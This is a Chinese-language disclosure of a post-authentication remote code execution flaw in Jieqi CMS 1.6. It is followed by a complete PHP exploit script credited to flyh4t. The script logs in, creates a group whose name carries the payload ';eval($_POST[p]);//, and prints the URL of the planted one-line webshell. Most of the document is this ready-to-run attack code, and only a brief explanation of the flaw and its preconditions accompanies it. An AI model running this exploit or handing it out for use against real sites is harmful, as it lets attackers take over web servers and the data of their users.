杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。

该系统存在多个远程安全漏洞,今天报告的这个是 1.6 版本的一个远程代码执行漏洞,应该有两年多历史了。从下面的利用代码看,问题出在圈子创建模块(modules/group/create.php):用户提交的圈子名称(gname)看起来未经转义就被写入 files/group/userdir/0/<圈子id>/info.php 这个 PHP 文件,因此提交 `';eval($_POST[p]);//` 即可闭合原有字符串字面量并植入一句话木马。
利用前提:需要有一个能创建圈子的用户账号(用户名和密码)。也就是说这是一个需要先登录的代码注入,而不是未授权即可利用的漏洞;评估影响时应以"能注册/拥有圈子创建权限的用户"为攻击面。
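<?php
/**
 * Jieqi CMS V1.6 PHP code injection exploit (post-authentication).
 *
 * Original author: flyh4t (phpsec at hotmail dot com), team http://www.wolvez.org
 *
 * Flow:
 *   1. log in through login.php as a user who is allowed to create a group;
 *      the session cookie is kept in a local cookie jar (cookie.txt in cwd);
 *   2. create a group whose name (gname) carries the payload
 *      `';eval($_POST[p]);//` — judging from the resulting shell path the
 *      name is presumably written unescaped into
 *      files/group/userdir/0/<gid>/info.php as PHP source, so the quote
 *      closes the string literal and the eval() becomes live code;
 *   3. read the new group id (g=NNN) from the response and print the URL
 *      of the resulting webshell (code is passed in POST parameter "p").
 *
 * The original author notes it "works regardless of php.ini settings";
 * presumably because the payload ends up as ordinary PHP source on disk
 * rather than relying on register_globals or similar — not verified here.
 *
 * Fixes relative to the original listing:
 *   - usage text now lists the password, which $argc < 5 already required;
 *   - curl_error() was called on an undefined handle ($ch) on failure;
 *   - the group-creation request and the g=NNN match are now checked
 *     instead of printing a shell URL with an empty group id.
 */

print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

// $argc counts argv[0], so 5 means: host, path, username and password.
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path username password
host:     target server (ip/hostname)
path:     path to jieqicms
username: a username who can create group
password: password of that user
Example:
php ' . $argv[0] . ' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);                 // E_ERROR | E_WARNING | E_PARSE
ini_set('max_execution_time', 0);

$host     = $argv[1];
$path     = trim($argv[2], '/');    // accept "/jieqi/", "jieqi" or "/jieqi" alike
$username = $argv[3];
$password = $argv[4];
$base     = rtrim("http://$host/$path", '/');

/* step 1: log in and keep the session cookie in a local jar
 * (the jar is written to the current directory and persists after the run) */
$cookie_jar = 'cookie.txt';
$login_url  = "$base/login.php";
$login_body = "password=$password&username=$username&usecookie=86400"
            . "&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B"
            . "&action=login&jumpreferer=1";

$login = curl_init();
curl_setopt($login, CURLOPT_URL, $login_url);
curl_setopt($login, CURLOPT_COOKIEJAR, $cookie_jar);
curl_setopt($login, CURLOPT_POST, 1);
curl_setopt($login, CURLOPT_POSTFIELDS, $login_body);
curl_setopt($login, CURLOPT_RETURNTRANSFER, 1);
$login_resp = curl_exec($login);
if ($login_resp === false) {
    echo 'cURL Error: ' . curl_error($login) . "\n";
    curl_close($login);
    exit('exploit failed');
}
curl_close($login);
// NOTE(review): only a transport failure is detected here; a rejected
// login still falls through and surfaces later as a missing g=NNN.

/* step 2: create a group whose name carries the payload.
 * The leading quote is meant to close the string literal that gname is
 * written into; the trailing // comments out the rest of that line. */
$payload = '\';eval($_POST[p]);//flyh4t';
$fields  = array(
    'gname'  => $payload,
    'gcatid' => '1',
    'gaudit' => '1',
    'gbrief' => '1',
);

$create = curl_init();
curl_setopt($create, CURLOPT_URL, "$base/modules/group/create.php");
curl_setopt($create, CURLOPT_COOKIEFILE, $cookie_jar);
curl_setopt($create, CURLOPT_POST, 1);
// An array body makes libcurl emit multipart/form-data with its own boundary,
// replacing the hand-built body and fixed boundary of the original.
curl_setopt($create, CURLOPT_POSTFIELDS, $fields);
curl_setopt($create, CURLOPT_RETURNTRANSFER, 1);
$resp = curl_exec($create);
if ($resp === false) {
    echo 'cURL Error: ' . curl_error($create) . "\n";
    curl_close($create);
    exit('exploit failed');
}
curl_close($create);

/* step 3: the response carries the new group id as g=NNN; without it there
 * is no shell path to report (login rejected, no group permission, or the
 * target is not vulnerable). */
if (!preg_match('/g=([0-9]{1,4})/', $resp, $match)) {
    exit("exploit failed: no group id (g=NNN) found in the response\n");
}

$shell_url = "$base/files/group/userdir/0/{$match[1]}/info.php";
echo "view you shell here(password:p)\r\n";
echo $shell_url;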